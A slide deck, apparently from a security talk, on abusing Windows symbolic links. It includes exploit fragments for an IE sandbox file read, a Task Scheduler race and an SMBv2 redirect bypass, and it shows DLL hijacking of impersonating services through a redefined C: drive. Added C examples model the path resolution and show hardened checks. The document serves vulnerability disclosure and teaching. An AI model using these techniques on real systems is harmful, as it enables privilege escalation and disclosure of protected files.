A Link to the Past
Abusing Symbolic Links on Windows
James Forshaw @tiraniddo
Obligatory Background Slide
● Researcher in Google’s Project Zero team
● Specialize in Windows
○ Especially local privilege escalation
● Never met a logical vulnerability I didn’t like
Image credit: https://www.flickr.com/photos/barretthall/2478623520/
What I’m Going to Talk About
● Implementation of Symbolic Links on Windows
● Exploitable Bug Classes
● Example vulnerabilities
● Offensive exploitation tricks
Symbolic Links
Dangers of Symbolic Links
Resource Creation or Overwrite
Diagram: a privileged application writes to \path\to\resource, which is a symbolic link, so the write lands on \sensitive\path.
Information Disclosure
Diagram: a privileged application reads \path\to\resource, which is a symbolic link to \sensitive\path, and the contents are disclosed to an unprivileged application.
Time of Check/Time of Use
Diagram: a privileged application checks \path\to\resource and then uses it; at check time the symbolic link points to \valid\file, by use time it has been switched to \malicious\file.
History of Windows Symbolic Links
Windows NT 3.1 - July 27 1993: Object Manager Symbolic Links, Registry Key Symbolic Links
Windows 2000 - Feb 17 2000: NTFS Mount Points and Directory Junctions
Windows Vista - Nov 30 2006: NTFS Symbolic Links
Object Manager Symbolic Links
Named Objects
IO/File: \??\C:\Windows\notepad.exe, \Device\NamedPipe\mypipe
Registry: \Registry\Machine\Software
Semaphore: \BaseNamedObjects\MySema
Creating Object Manager Symbolic Links
HANDLE CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)
{
    OBJECT_ATTRIBUTES obj_attr;
    UNICODE_STRING name, target;
    HANDLE hLink = nullptr;
    // linkname is an absolute NT name, e.g. L"\\RPC Control\\mylink";
    // targetname is the NT path the link resolves to (not checked at creation)
    RtlInitUnicodeString(&name, linkname);
    RtlInitUnicodeString(&target, targetname);
    InitializeObjectAttributes(&obj_attr, &name,
        OBJ_CASE_INSENSITIVE, nullptr, nullptr);
    NtCreateSymbolicLinkObject(&hLink, SYMBOLIC_LINK_ALL_ACCESS,
        &obj_attr, &target);
    return hLink;
}
Object Manager Reparsing
NtOpenSemaphore → ObOpenObjectByName → ObpLookupObjectName
Parsing Name: \MyObjects\Global\MySema
ObpLookupObjectName walks the name one component at a time. When the current component (Global) is a symbolic link object, ObpParseSymbolicLink substitutes its target:
Global → \BaseNamedObjects
The rewritten name \BaseNamedObjects\MySema is returned with STATUS_REPARSE and the lookup starts again from the root with that name.
Abusing Object Manager Symbolic Links
● Most obvious attack is object squatting
○ Redirect privileged object creation to another name
○ Open named pipes for attacking impersonation
○ Shadowing ALPC ports
● File symlink attacks perhaps more interesting!
Example Vulnerability
IE EPM MOTWCreateFile Information Disclosure
IE Shell Broker MOTWCreateFile
HANDLE MOTWCreateFile(PCWSTR FileName, ...) {
  // The broker opens the file for the sandboxed tab only if it carries a
  // Mark-of-the-Web or its name ends in .url
  if (FileHasMOTW(FileName) || IsURLFile(FileName)) {
    return CreateFile(FileName, GENERIC_READ, ...);
  }
}
BOOL IsURLFile(PCWSTR FileName) {
  // Extension check on the caller-supplied name, before any path resolution
  PCWSTR extension = PathFindExtension(FileName);
  return _wcsicmp(extension, L".url") == 0;
}
Win32 Path Support
Path - Description
somepath - Relative path to current directory
c:\somepath - Absolute path
\\.\c:\somepath - Device path, canonicalized
\\?\c:\somepath - Device path, non-canonicalized
Interesting! (the two device-path forms)
Win32 to Native NT File Paths
Win32 Path: \\.\c:\somepath
Native Path (RtlDosPathNameToRelativeNtPathName): \??\c:\somepath
After Lookup (ObpLookupObjectName): \Device\HarddiskVolume4\somepath
Global Root Symlink
\??\GLOBALROOT is a symbolic link object with an empty target (empty symlink path)
Win32 Path: \\.\GLOBALROOT\somepath
Native Path (RtlDosPathNameToRelativeNtPathName): \??\GLOBALROOT\somepath
After Lookup (ObpLookupObjectName): \somepath
With an empty target substituted, the rest of the name is looked up from the object manager root, so any NT object path can be reached through a Win32 file path.
Writeable Object Directories from IE Sandbox
Path - Sandbox
\RPC Control - PM
\Sessions\X\BaseNamedObjects - PM
\Sessions\X\AppContainerNamedObjects\SID... - EPM
Exploiting
IShDocVwBroker* broker;
CreateSymlink(L"\\RPC Control\\fake.url",
              L"\\??\\C:\\somefile");
broker->MOTWCreateFile(
    L"\\\\.\\GLOBALROOT\\RPC Control\\fake.url",
    ...);
// Read File
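The path conversion, the GLOBALROOT link and the broker's extension check fit together in a few dozen lines. The following C model is an added example, not code from the talk or from Windows: it reimplements the prefix rules of RtlDosPathNameToNtPathName and the symbolic-link reparse loop of ObpLookupObjectName over a constructed namespace table (GLOBALROOT with an empty target and \??\C: pointing at a volume device are real, the volume number and the attacker's \RPC Control\fake.url link are assumptions), then applies the broker's IsURLFile test to the supplied name and to the name the kernel actually resolves. The \?? prefix is treated as an ordinary directory here; the per-session device map it really stands for is covered later in the deck.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NT_PATH_MAX 512
#define MAX_REPARSE 32   /* assumed cap; the real lookup bounds reparse loops too */

/* Object manager symbolic links, name -> target (constructed table). */
struct om_symlink { const char *name; const char *target; };
static const struct om_symlink g_symlinks[] = {
    { "\\??\\GLOBALROOT",        "" },                          /* empty target: real */
    { "\\??\\C:",                "\\Device\\HarddiskVolume4" }, /* volume number assumed */
    { "\\RPC Control\\fake.url", "\\??\\C:\\somefile" },        /* made by the sandboxed process */
};

/* Case-insensitive prefix test, as OBJ_CASE_INSENSITIVE lookups behave. */
static int prefix_icase(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* RtlDosPathNameToNtPathName prefix rules, simplified: \\?\X and \\.\X both
 * become \??\X (the \\.\ form is canonicalised first, not modelled here) and
 * an absolute drive path C:\X becomes \??\C:\X. Relative paths need the
 * current directory and are rejected. Returns 0 on success. */
static int win32_to_nt_path(const char *win32, char *nt, size_t ntsz)
{
    if (prefix_icase(win32, "\\\\?\\") || prefix_icase(win32, "\\\\.\\"))
        return snprintf(nt, ntsz, "\\??\\%s", win32 + 4) < (int)ntsz ? 0 : -1;
    if (isalpha((unsigned char)win32[0]) && win32[1] == ':' && win32[2] == '\\')
        return snprintf(nt, ntsz, "\\??\\%s", win32) < (int)ntsz ? 0 : -1;
    return -1;
}

/* Model of ObpLookupObjectName: while the leading components name a symbolic
 * link object, splice in its target and restart from the root, which is what
 * STATUS_REPARSE does. Returns the number of reparses, or -1 on a loop. */
static int om_resolve(const char *nt, char *out, size_t outsz)
{
    char cur[NT_PATH_MAX], next[NT_PATH_MAX];
    int reparses = 0, matched;
    snprintf(cur, sizeof cur, "%s", nt);
    do {
        matched = 0;
        for (size_t i = 0; i < sizeof g_symlinks / sizeof g_symlinks[0]; i++) {
            size_t n = strlen(g_symlinks[i].name);
            if (!prefix_icase(cur, g_symlinks[i].name) || (cur[n] != '\\' && cur[n] != '\0'))
                continue;
            if (++reparses > MAX_REPARSE) return -1;
            snprintf(next, sizeof next, "%s%s", g_symlinks[i].target, cur + n);
            snprintf(cur, sizeof cur, "%s", next);
            matched = 1;
            break;
        }
    } while (matched);
    snprintf(out, outsz, "%s", cur);
    return reparses;
}

/* IsURLFile as the broker does it: PathFindExtension on the supplied name. */
static const char *path_find_extension(const char *path)
{
    const char *dot = NULL;
    for (const char *p = path; *p; p++) {
        if (*p == '\\') dot = NULL;
        else if (*p == '.') dot = p;
    }
    return dot ? dot : path + strlen(path);
}

static int is_url_file(const char *path)
{
    const char *ext = path_find_extension(path);
    return prefix_icase(ext, ".url") && ext[4] == '\0';
}

/* Returns 1 when the supplied name passes the .url test but the object the
 * kernel resolves is not a .url file, i.e. the broker's check was bypassed.
 * resolved receives the final NT name. */
static int motw_check_bypassed(const char *win32, char *resolved, size_t sz)
{
    char nt[NT_PATH_MAX];
    if (sz) resolved[0] = '\0';
    if (!is_url_file(win32)) return 0;                /* broker refuses outright */
    if (win32_to_nt_path(win32, nt, sizeof nt) != 0) return 0;
    if (om_resolve(nt, resolved, sz) < 0) return 0;
    return !is_url_file(resolved);
}

/* A hardened broker check: refuse device-prefixed names and re-check the
 * extension on the resolved name (a real broker would take that name from
 * the opened handle). Returns 1 if the open should be allowed. */
static int motw_check_hardened(const char *win32)
{
    char nt[NT_PATH_MAX], resolved[NT_PATH_MAX];
    if (prefix_icase(win32, "\\\\?\\") || prefix_icase(win32, "\\\\.\\")) return 0;
    if (!is_url_file(win32) || win32_to_nt_path(win32, nt, sizeof nt) != 0) return 0;
    if (om_resolve(nt, resolved, sizeof resolved) < 0) return 0;
    return is_url_file(resolved);
}

int main(void)
{
    const char *attack = "\\\\.\\GLOBALROOT\\RPC Control\\fake.url";
    char resolved[NT_PATH_MAX];
    int bypassed = motw_check_bypassed(attack, resolved, sizeof resolved);
    printf("IsURLFile(%s) = %d\n", attack, is_url_file(attack));
    printf("bypassed = %d, kernel opens %s\n", bypassed, resolved);
    printf("hardened: attack %d, C:\\Users\\x.url %d\n",
           motw_check_hardened(attack), motw_check_hardened("C:\\Users\\x.url"));
    return 0;
}
```

The attack name resolves in three reparses: GLOBALROOT drops the \?? prefix, \RPC Control\fake.url is the attacker's link, and \??\C: becomes the volume device, so the broker's GENERIC_READ open lands on \Device\HarddiskVolume4\somefile while its extension check only ever saw fake.url. The same loop models the later mount point plus object manager symlink chain: add the mount point as one more table entry.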
Registry Key Symbolic Links
Under the hood
NtOpenKey → ObOpenObjectByName → ObpLookupObjectName → CmpParseKey
Parsing Name: \Registry\Machine\Mylink
Once the lookup reaches the \Registry object, CmpParseKey takes over the remaining components. When the current component (Mylink) is a symbolic link key, CmpGetSymbolicLink fetches its target, the name is rewritten to \Registry\Machine\NewKey and returned with STATUS_REPARSE, so ObpLookupObjectName starts again with the new name.
Serious Limitations
● Windows 7 fixed numerous issues with registry symbolic links
○ Blocked symlinks between untrusted (user) and trusted (local machine) hives
○ Symbolic link target must be a valid registry path
● MS10-021 backported the same fixes to earlier Windows versions
● Still can exploit user to user vulnerabilities such as in IE EPM
○ CVE-2013-5054
○ CVE-2014-6322
● Mitigation (pass flag to RegCreateKeyEx) still undocumented
NTFS Mount Points / Directory Junctions
Under the hood
NtOpenFile → ObOpenObjectByName → ObpLookupObjectName → IopParseDevice → NTFS Driver
Parsing Name: \??\C:\temp\mylink\file
When the name reaches the volume device object, IopParseDevice hands the remaining path (\temp\mylink\file) to the NTFS driver. Finding that mylink carries a mount point reparse tag, NTFS substitutes the target \??\C:\Windows, which gives \??\C:\Windows\file, and completes with STATUS_REPARSE so that ObpLookupObjectName restarts with the new name.
Structure of a Mount Point
typedef struct MOUNT_POINT_REPARSE_BUFFER {
    // Header
    ULONG ReparseTag;            // set to 0xA0000003 for a mount point
    USHORT ReparseDataLength;
    USHORT Reserved;
    // Reparse data
    USHORT SubstituteNameOffset; // substitute NT name, the path actually followed
    USHORT SubstituteNameLength;
    USHORT PrintNameOffset;      // print name, display only
    USHORT PrintNameLength;
    WCHAR PathBuffer[1];         // string data
};
Create a Mount Point
PREPARSE_DATA_BUFFER reparse_buffer =
    BuildMountPoint(target);
CreateDirectory(dir);
// Open the directory itself rather than anything it already points to
HANDLE handle = CreateFile(dir, ...,
    FILE_FLAG_BACKUP_SEMANTICS |
    FILE_FLAG_OPEN_REPARSE_POINT, ...);
DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT,
    reparse_buffer,
    REPARSE_DATA_BUFFER_HEADER_SIZE + reparse_buffer->ReparseDataLength, ...);
Mount Point Limitations
● Directory must be empty to set the reparse data
● Target device must be an IO device (no opening registry keys for example)
● Target device heavily restricted in IopParseDevice:
IO_PARSE_CONTEXT *ctx;
if (ctx->LastReparseTag == IO_REPARSE_TAG_MOUNT_POINT) {
  switch(TargetDeviceType) { // limited device subset
  case FILE_DEVICE_DISK:
  case FILE_DEVICE_CD_ROM:
  case FILE_DEVICE_VIR TUAL_DISK:
  case FILE_DEVICE_TAPE:
    break;
  default:
    return STATUS_IO_REPARSE_DATA_INVALID;
  }
}
Example Vulnerability
Windows Task Scheduler TOCTOU Arbitrary File Creation
Running a Scheduled Task
void Load_Task_File(string task_name,
                    string orig_hash) {
  string task_path =
      "c:\\windows\\system32\\tasks\\" +
      task_name;
  // Hash task file contents
  string file_hash = Hash_File(task_path);
  if (file_hash != orig_hash) {
    // Rewrite task without impersonation: task_path is opened a second
    // time, as the service, which is where the TOCTOU window sits
    Rewrite_Task_File(task_path);
  }
}
System Task Folder
Writable from normal user privilege, therefore can create a mount point directory
Winning the Race Condition
Timeline: Hash File → (window) → Rewrite Task File → ???? → Profit?
Is that an OPLOCK in your Pocket?
void SetOplock(HANDLE hFile) {
  REQUEST_OPLOCK_INPUT_BUFFER inputBuffer;
  REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer;
  OVERLAPPED overlapped;
  overlapped.hEvent = CreateEvent(...);
  // Asynchronous request: it completes, signalling the event, when another
  // handle opens the file and breaks the oplock
  DeviceIoControl(hFile, FSCTL_REQUEST_OPLOCK,
      &inputBuffer, sizeof(inputBuffer),
      &outputBuffer, sizeof(outputBuffer),
      nullptr, &overlapped);
  WaitForSingleObject(overlapped.hEvent, ...);
}
Exploitation
User Application | Task Scheduler Service
1. User application: create the mount point MyTaskFolder → C:\dummy, take an oplock on C:\Dummy\MyTask, then call IRegisteredTask::Run.
2. Task Scheduler Service: Open File for Reading C:\Dummy\MyTask. The open breaks the oplock and the user application's event is set.
3. User application: change mount point location to MyTaskFolder → C:\windows, then release the oplock.
4. Task Scheduler Service: Generate and Verify Hash of File C:\Dummy\MyTask.
5. Task Scheduler Service: Rewrite Task File, which now resolves through the mount point to C:\Windows\MyTask.
OPLOCK Limitations
● Can’t block on access to standard attributes or FILE_READ_ATTRIBUTES
● One-shot, need to be quick to reestablish if the file is opened multiple times
● Can get around attribute reading in certain circumstances by oplocking a directory.
● For example these scenarios open directories for read access:
○ Shell SHParseDisplayName accesses each directory in path
○ GetLongPathName or GetShortPathName
○ FindFirstFile/FindNextFile
DEMO
OPLOCKs in Action
NTFS Symbolic Links
Structure of a Symbolic Link
typedef struct SYMLINK_REPARSE_BUFFER {
    // Header
    ULONG ReparseTag;            // set to 0xA000000C for a symlink
    USHORT ReparseDataLength;
    USHORT Reserved;
    // Reparse data
    USHORT SubstituteNameOffset;
    USHORT SubstituteNameLength;
    USHORT PrintNameOffset;
    USHORT PrintNameLength;
    ULONG Flags;                 // 0 - absolute path, 1 - relative path
    WCHAR PathBuffer[1];
};
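BuildMountPoint on the Create a Mount Point slide and the two structures above are enough to write the buffer builder. The following C is an added example, not the talk's code and not the Windows SDK: it lays out a REPARSE_DATA_BUFFER byte by byte for either tag, using the tag values and field order from the slides. The helper names, the sample target \??\C:\Windows and the relative symlink target are illustrative.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IO_REPARSE_TAG_MOUNT_POINT       0xA0000003u
#define IO_REPARSE_TAG_SYMLINK           0xA000000Cu
#define SYMLINK_FLAG_RELATIVE            0x00000001u
#define REPARSE_DATA_BUFFER_HEADER_SIZE  8
#define MAXIMUM_REPARSE_DATA_BUFFER_SIZE (16 * 1024)

/* Little-endian field helpers: the buffer is laid out byte by byte so the
 * result matches the kernel's structure regardless of host alignment. */
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get32(const uint8_t *p) { return get16(p) | ((uint32_t)get16(p + 2) << 16); }

/* Encode an ASCII path as UTF-16LE (real callers pass WCHAR). Returns bytes written. */
static size_t to_utf16le(const char *s, uint8_t *out)
{
    size_t n = 0;
    for (; *s; s++) { out[n++] = (uint8_t)*s; out[n++] = 0; }
    return n;
}

/* Build the REPARSE_DATA_BUFFER for a mount point (0xA0000003) or an NTFS
 * symbolic link (0xA000000C). substitute is the name the file system follows:
 * an NT path such as "\??\C:\Windows", or a relative path together with
 * SYMLINK_FLAG_RELATIVE; print_name is display only. Both strings are stored
 * NUL-terminated in PathBuffer. Returns the total byte count to hand to
 * FSCTL_SET_REPARSE_POINT, or 0 if the buffer would not fit or the tag is
 * not one of the two. */
static size_t build_reparse_buffer(uint32_t tag, const char *substitute,
                                   const char *print_name, uint32_t flags,
                                   uint8_t *buf, size_t bufsz)
{
    size_t fixed;                                        /* fields before PathBuffer */
    if (tag == IO_REPARSE_TAG_MOUNT_POINT) fixed = 8;    /* 4 x USHORT */
    else if (tag == IO_REPARSE_TAG_SYMLINK) fixed = 12;  /* 4 x USHORT + ULONG Flags */
    else return 0;

    size_t sub_len = strlen(substitute) * 2, print_len = strlen(print_name) * 2;
    size_t total = REPARSE_DATA_BUFFER_HEADER_SIZE + fixed + sub_len + 2 + print_len + 2;
    if (total > bufsz || total > MAXIMUM_REPARSE_DATA_BUFFER_SIZE) return 0;
    memset(buf, 0, total);

    put32(buf, tag);                                                      /* ReparseTag */
    put16(buf + 4, (uint16_t)(total - REPARSE_DATA_BUFFER_HEADER_SIZE)); /* ReparseDataLength */
    uint8_t *d = buf + REPARSE_DATA_BUFFER_HEADER_SIZE;                  /* Reserved at +6 stays 0 */
    put16(d + 0, 0);                       /* SubstituteNameOffset */
    put16(d + 2, (uint16_t)sub_len);       /* SubstituteNameLength, NUL not counted */
    put16(d + 4, (uint16_t)(sub_len + 2)); /* PrintNameOffset, after that NUL */
    put16(d + 6, (uint16_t)print_len);     /* PrintNameLength */
    if (tag == IO_REPARSE_TAG_SYMLINK) put32(d + 8, flags);

    uint8_t *path = d + fixed;
    to_utf16le(substitute, path);
    to_utf16le(print_name, path + sub_len + 2);
    return total;
}

/* Read the header back, as the kernel will. reparse_field index 0..3 is
 * SubstituteNameOffset, SubstituteNameLength, PrintNameOffset, PrintNameLength. */
static uint32_t reparse_tag(const uint8_t *buf)          { return get32(buf); }
static uint16_t reparse_data_length(const uint8_t *buf)  { return get16(buf + 4); }
static uint16_t reparse_field(const uint8_t *buf, int i) { return get16(buf + 8 + 2 * i); }
static uint32_t symlink_flags(const uint8_t *buf)        { return get32(buf + 16); }

int main(void)
{
    uint8_t buf[MAXIMUM_REPARSE_DATA_BUFFER_SIZE];
    size_t n = build_reparse_buffer(IO_REPARSE_TAG_MOUNT_POINT, "\\??\\C:\\Windows",
                                    "C:\\Windows", 0, buf, sizeof buf);
    printf("mount point: %zu bytes, tag 0x%08X, data length %u, substitute %u bytes at %u\n",
           n, (unsigned)reparse_tag(buf), (unsigned)reparse_data_length(buf),
           (unsigned)reparse_field(buf, 1), (unsigned)reparse_field(buf, 0));
    n = build_reparse_buffer(IO_REPARSE_TAG_SYMLINK, "..\\target.txt", "..\\target.txt",
                             SYMLINK_FLAG_RELATIVE, buf, sizeof buf);
    printf("symlink: %zu bytes, tag 0x%08X, flags %u\n",
           n, (unsigned)reparse_tag(buf), (unsigned)symlink_flags(buf));
    return 0;
}
```

The returned size is what FSCTL_SET_REPARSE_POINT needs on a directory handle opened with FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT. Only the mount point form can be set by a normal user; the symlink form runs into the NTFS privilege check on the next slides, which is also why the symlink tag is the one worth validating when a buffer arrives from somewhere untrusted.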
Create Symlink Privilege
Admin user - Yay! (holds SeCreateSymbolicLinkPrivilege by default)
Normal user - Boo :-( (does not)
Create Symbolic Link Privilege
NTSTATUS NtfsSetReparsePoint(NTFS_CREATE_CONTEXT* ctx) {
  // Validation ...
  PREPARSE_DATA_BUFFER reparse_buf;
  if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) &&
      (ctx->Type != FILE_DIRECTORY)) {
    return STATUS_NOT_A_DIRECTORY;
  }
  // Context must contain the 0x400 flag to set a symlink
  if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_SYMLINK) &&
      ((ctx->Flags & 0x400) == 0)) {
    return STATUS_ACCESS_DENIED;
  }
  // ...
}
Flags Setting
NTSTATUS NtfsSetCcbAccessFlags(NTFS_FILE_CONTEXT* ctx) {
ACCESS_MODE AccessMode = NtfsEffectiveMode();
if (ctx->HasRestorePrivilege) {
ctx->Flags |= 0x400;
}
if (AccessMode == KernelMode ||
SeSinglePrivilegeCheck(&SeCreateSymbolicLinkPrivilege,
&security_ctx,
UserMode)) {
ctx->Flags |= 0x400;
}
// ...
}
Hypothetical Scenario
NTSTATUS Handle_OpenLog(PIRP Irp) {
  OBJECT_ATTRIBUTES objattr;
  UNICODE_STRING name;
  RtlInitUnicodeString(&name,
      L"\\SystemRoot\\LogFiles\\user.log");
  InitializeObjectAttributes(&objattr, &name, 0, NULL, NULL);
  PHANDLE Handle = Irp->AssociatedIrp.SystemBuffer;
  // Opened from kernel mode, so the handle's CCB carries the 0x400 flag;
  // the handle is then returned to the user mode process
  return ZwCreateFile(Handle, &objattr, ...);
}
SMBv2 Symbolic Links
https://msdn.microsoft.com/en-us/library/cc246542.aspx
SMBv2 Symbolic Link Restrictions
● Remote to Local would be useful
● Disabled by default in local security policy
Back to IopParseDevice
enum SymlinkDeviceType { Local, Network };
if (ctx->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { // ... }
else {
  // Enforces symlink traversal policy based on source and target device types
  SymlinkDeviceType target_type =
      GetSymlinkDeviceType(TargetDeviceType);
  if (target_type == Local || target_type == Network)
  {
    if (!NT_SUCCESS(IopSymlinkEnforceEnabledTypes(
            target_type, ctx->last_target_type))) {
      return STATUS_IO_REPARSE_DATA_INVALID;
    }
  }
}
MRXSMB20
NTSTATUS Smb2Create_Finalize(SMB_CONTEXT* ctx) {
  // Make request and get response
  if (RequestResult == STATUS_STOPPED_ON_SYMLINK) {
    // Only the buffer shape is validated: no check on ReparseTag
    result = FsRtlValidateReparsePointBuffer(
        ctx->ErrorData, ctx->ErrorDataLength);
    if (!NT_SUCCESS(result)) {
      return result;
    }
  }
  // ...
}
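The check MRXSMB20 omits is short to state in code. The following C is an added example, not the redirector's code: validate_reparse_buffer performs the shape checks in the spirit of FsRtlValidateReparsePointBuffer (restricted to the two Microsoft tags), and check_remote_symlink_payload adds the tag check the slide says is missing. The two server responses are constructed byte arrays, both carrying the substitute name \??\C:\x and no print name; the status names are the slides' own, the numeric codes are placeholders.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IO_REPARSE_TAG_MOUNT_POINT 0xA0000003u
#define IO_REPARSE_TAG_SYMLINK     0xA000000Cu

/* Outcomes, named after the NTSTATUS codes the slides mention (values are placeholders). */
enum { STATUS_OK = 0, STATUS_IO_REPARSE_DATA_INVALID = 1, STATUS_IO_REPARSE_TAG_MISMATCH = 2 };

static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get32(const uint8_t *p) { return get16(p) | ((uint32_t)get16(p + 2) << 16); }

/* Shape check in the spirit of FsRtlValidateReparsePointBuffer, limited to
 * the two Microsoft tags: the header fits, ReparseDataLength matches the
 * bytes supplied, and both name offset/length pairs lie inside PathBuffer
 * and are whole UTF-16 units. */
static int validate_reparse_buffer(const uint8_t *buf, size_t len)
{
    if (len < 8) return STATUS_IO_REPARSE_DATA_INVALID;
    uint32_t tag = get32(buf);
    size_t data_len = get16(buf + 4);
    if (data_len + 8 != len) return STATUS_IO_REPARSE_DATA_INVALID;
    size_t fixed = tag == IO_REPARSE_TAG_MOUNT_POINT ? 8 : tag == IO_REPARSE_TAG_SYMLINK ? 12 : 0;
    if (fixed == 0 || data_len < fixed) return STATUS_IO_REPARSE_DATA_INVALID;
    const uint8_t *d = buf + 8;
    size_t sub_off = get16(d), sub_len = get16(d + 2), print_off = get16(d + 4), print_len = get16(d + 6);
    size_t path_len = data_len - fixed;
    if ((sub_off | sub_len | print_off | print_len) & 1) return STATUS_IO_REPARSE_DATA_INVALID;
    if (sub_off + sub_len > path_len || print_off + print_len > path_len) return STATUS_IO_REPARSE_DATA_INVALID;
    return STATUS_OK;
}

/* What the redirector should do with the error data of a
 * STATUS_STOPPED_ON_SYMLINK response: a well-formed buffer is not enough,
 * the tag must be the symlink tag, because IopParseDevice applies the
 * remote-to-local policy only to symlinks and would follow a mount point
 * tag straight to the local NTFS driver. */
static int check_remote_symlink_payload(const uint8_t *buf, size_t len)
{
    int st = validate_reparse_buffer(buf, len);
    if (st != STATUS_OK) return st;
    if (get32(buf) != IO_REPARSE_TAG_SYMLINK) return STATUS_IO_REPARSE_TAG_MISMATCH;
    return STATUS_OK;
}

/* Constructed server payloads: substitute name "\??\C:\x" (16 bytes UTF-16LE), no print name. */
static const uint8_t k_server_mount_point[] = {
    0x03,0x00,0x00,0xA0, 0x18,0x00, 0x00,0x00,          /* tag, ReparseDataLength=24, Reserved */
    0x00,0x00, 0x10,0x00, 0x10,0x00, 0x00,0x00,         /* sub off/len, print off/len */
    '\\',0,'?',0,'?',0,'\\',0,'C',0,':',0,'\\',0,'x',0  /* PathBuffer */
};
static const uint8_t k_server_symlink[] = {
    0x0C,0x00,0x00,0xA0, 0x1C,0x00, 0x00,0x00,          /* tag, ReparseDataLength=28, Reserved */
    0x00,0x00, 0x10,0x00, 0x10,0x00, 0x00,0x00,         /* sub off/len, print off/len */
    0x00,0x00,0x00,0x00,                                 /* Flags: absolute */
    '\\',0,'?',0,'?',0,'\\',0,'C',0,':',0,'\\',0,'x',0
};

int main(void)
{
    printf("symlink payload: %d\n",
           check_remote_symlink_payload(k_server_symlink, sizeof k_server_symlink));
    printf("mount point payload: %d (shape alone passes: %d)\n",
           check_remote_symlink_payload(k_server_mount_point, sizeof k_server_mount_point),
           validate_reparse_buffer(k_server_mount_point, sizeof k_server_mount_point) == STATUS_OK);
    return 0;
}
```

The mount point payload passes the shape check exactly as it passes FsRtlValidateReparsePointBuffer in the redirector; only the tag comparison rejects it, which is the line the bypass on the next slides depends on being absent.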
SMBv2 Device Type Bypass
NtOpenFile → ObpLookupObjectName → IopParseDevice → SMB2 Driver → Server
Parsing Name: \\server\share\file
1. With the current component being the server, the SMB2 driver sends a Create for \share\file to the attacker's server.
2. The server replies STATUS_STOPPED_ON_SYMLINK, but with a reparse buffer tagged IO_REPARSE_TAG_MOUNT_POINT and a substitute name of \??\C:\hello.txt.
3. MRXSMB20 only checks the buffer shape, so the open completes with STATUS_REPARSE; IopParseDevice sees a mount point tag, the remote-to-local symlink policy is never applied, and the name \??\C:\hello.txt goes to the local NTFS driver.
DEMO
SMBv2 Local File Disclosure in IE
File Symbolic Links - Without Permissions
First Try
Default CreateFile call won’t open the file. Returns Access Denied
Success
FILE_FLAG_BACKUP_SEMANTICS allows us to open the file
The NtCreateFile Paradox
FILE_DIRECTORY_FILE Flag
FILE_NON_DIRECTORY_FILE Flag
Neither FILE_DIRECTORY_FILE nor FILE_NON_DIRECTORY_FILE
The Old ADS Directory Trick
Using the $INDEX_ALLOCATION stream will bypass the initial directory failure
Let Our Powers Combine
NtOpenFile → ObpLookupObjectName → IopParseDevice → NTFS Driver
Parsing Name: \??\C:\temp\mylink
mylink is a mount point whose target is \RPC Control\mylink; the NTFS driver substitutes it and returns STATUS_REPARSE.
ObpLookupObjectName then looks up \RPC Control\mylink, an object manager symbolic link; ObpParseSymbolicLink substitutes its target \??\C:\hello.txt and returns STATUS_REPARSE again, so the open ends up at \??\C:\hello.txt without any SeCreateSymbolicLinkPrivilege.
Persisting the Symlink
● Might be useful to persist the symlink between login sessions
● Can’t pass OBJ_PERMANENT directly
○ Needs SeCreatePermanentPrivilege
● Get CSRSS to do it for us :-)
DefineDosDeviceW(
    DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH,
    L"GLOBALROOT\\RPC Control\\mylink", // created under \??, so it lands at \RPC Control\mylink
    L"TargetPath"                        // raw NT path of the target
);
Combined Symbolic Link Limitations
● All existing limitations of Mount Points apply
● Vulnerable application can’t try to list or inspect the mount point itself
○ Listing the directory
○ Open for GetFileAttributes or similar
● Can mitigate somewhat by clever tricks with oplocks on directory hierarchy
DEMO
One More Thing!
CVE-2015-1644
DosDevice Prefix
\??\c:\somepath
THE PREFIX IS A LIE
\?? is not a real directory: it is resolved through the device map of the calling token's logon session, first the per-session directory, then the global one:
\Sessions\0\DosDevices\X-Y\c:\somepath
\GLOBAL??\c:\somepath
New C: Drive
Windows User Impersonation
Very Exploitable Behaviour
void ExploitableFunction() {
  ImpersonateLoggedOnUser(hToken);
  LoadLibrary("c:\\secure.dll");
  RevertToSelf();
}
While impersonating, the path is resolved with the impersonated user's device map:
c:\secure.dll → \??\c:\secure.dll → \Sessions\0\DosDevices\X-Y\c:\secure.dll
If that user has defined their own C: drive, the service ends up loading c:\somearbitrary.dll instead.
The same applies to a relative name and to COM activation:
void ExploitableFunction() {
  ImpersonateLoggedOnUser(hToken);
  LoadLibrary("secure.dll");
  RevertToSelf();
}
void COMExploitableFunction() {
  ImpersonateLoggedOnUser(hToken);
  CoCreateInstance(CLSID_SecureObject, ...);
  RevertToSelf();
}
Finding an Ideal Service
Requirement - Spooler Service
Runs as NT AUTHORITY\SYSTEM - Yup
Uses impersonation - Definitely
Accessible by normal user - Kind of the point
Has a habit of loading DLLs - Think of all the printer drivers
DEMO
REALLY One More Thing!
Links and References
● Symlink Testing Tools
https://github.com/google/symboliclink-testing-tools
● File Test Application
https://github.com/ladislav-zezula/FileTest
Questions?
 

Similar to Abusing Symlinks on Windows (20)

James Forshaw, elevator action
James Forshaw, elevator actionJames Forshaw, elevator action
James Forshaw, elevator action
 
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows KernelMemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
 
